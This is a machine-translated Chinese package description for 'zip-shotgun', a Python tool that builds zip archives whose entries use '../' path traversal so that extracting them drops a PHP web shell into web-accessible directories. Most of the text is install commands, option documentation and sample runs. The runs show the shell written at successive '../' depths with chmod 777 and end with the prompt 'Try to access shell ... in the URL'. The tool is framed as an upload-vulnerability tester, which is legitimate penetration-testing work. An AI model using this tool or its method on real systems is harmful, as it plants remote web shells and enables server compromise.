用于测试zip文件上载功能(以及可能提取的zip文件)是否存在漏洞的实用程序脚本
zip-shotgun的Python项目详细描述
拉链猎枪
用于测试zip文件上载功能(以及可能提取的zip文件)是否存在漏洞的实用程序脚本。 这个脚本的想法来自于Silent Signal Techblog - Compressed File Upload And Command Execution上的这篇文章 从OWASP - Test Upload of Malicious Files
此脚本将创建包含文件名为“../”的文件的存档。提取时,这可能会导致文件被提取到前面的目录。 它允许攻击者将外壳提取到可从Web浏览器访问的目录中。
默认的web shell是wwwolf的php web shell,它的所有功劳都归于whitewinterwolf。资源可用HERE
安装
使用python pip安装
pip install zip-shotgun --upgrade
克隆git存储库并安装
git clone https://github.com/jpiechowka/zip-shotgun.git
从克隆存储库的根目录(setup.py文件所在的位置)执行
pip install . --upgrade
用法和选项
Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE
Options:
--version Show the version and exit.
-c, --directories-count INTEGER
Count of how many directories to go back
inside the zip file (e.g 3 means that 3
files will be added to the zip: shell.php,
../shell.php and ../../shell.php where
shell.php is the name of the shell you
provided or randomly generated value
[default: 16]
-n, --shell-name TEXT Name of the shell inside the generated zip
file (e.g shell). If not provided it will be
randomly generated. Cannot have whitespaces
-f, --shell-file-path PATH A file that contains code for the shell. If
this option is not provided wwwolf
(https://github.com/WhiteWinterWolf/wwwolf-
php-webshell) php shell will be added
instead. If name is provided it will be
added to the zip with the provided name or
if not provided the name will be randomly
generated.
--compress Enable compression. If this flag is set
archive will be compressed using DEFALTE
algorithm with compression level of 9. By
default there is no compression applied.
-h, --help Show this message and exit.
示例
使用所有默认选项
zip-shotgun archive.zip
脚本输出的一部分
12/Dec/2018 Wed 23:13:13 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj 12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored. 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php ... 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URL
使用默认选项并为存档文件启用压缩
zip-shotgun --compress archive.zip
脚本输出的一部分
12/Dec/2018 Wed 23:16:13 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh 12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code 12/Dec/2018 Wed 23:16:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Wed 23:16:13 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9 ... 12/Dec/2018 Wed 23:16:13 +0100 | INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URL
使用默认选项,但将要返回存档的目录数更改为3
zip-shotgun --directories-count 3 archive.zip
zip-shotgun -c 3 archive.zip
脚本将总共向存档文件写入3个文件
脚本输出的一部分
12/Dec/2018 Wed 23:17:43 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F 12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored. 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URL
使用默认选项,但在存档文件中提供外壳名称并启用压缩
外壳名称不能有空格
zip-shotgun --shell-name custom-name --compress archive.zip
zip-shotgun -n custom-name --compress archive.zip
存档中的shell文件的名称将设置为用户提供的名称。
脚本输出的一部分
12/Dec/2018 Wed 23:19:12 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:19:12 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Using default file extension for wwwolf's webshell: php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../../custom-name.php ... 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL
提供自定义shell文件,但在存档文件中使用随机名称。将目录计数设置为3
zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zip
zip-shotgun -c 3 -f ./custom-shell.php archive.zip
shell代码将从用户提供的文件中提取。档案中的名字将随机生成。
脚本输出的一部分
12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:21:37 +0100 | WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf 12/Dec/2018 Wed 23:21:37 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Getting file extension from provided shell file for reuse: php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored. 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URL
提供自定义shell文件并将shell名称设置为保存在存档文件中。将目录计数设置为3并使用压缩
zip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
zip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zip
shell代码将从用户提供的文件中提取。档案中的名称将设置为用户提供的名称。
脚本输出的一部分
12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip 12/Dec/2018 Wed 23:25:19 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Getting file extension from provided shell file for reuse: php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../../custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL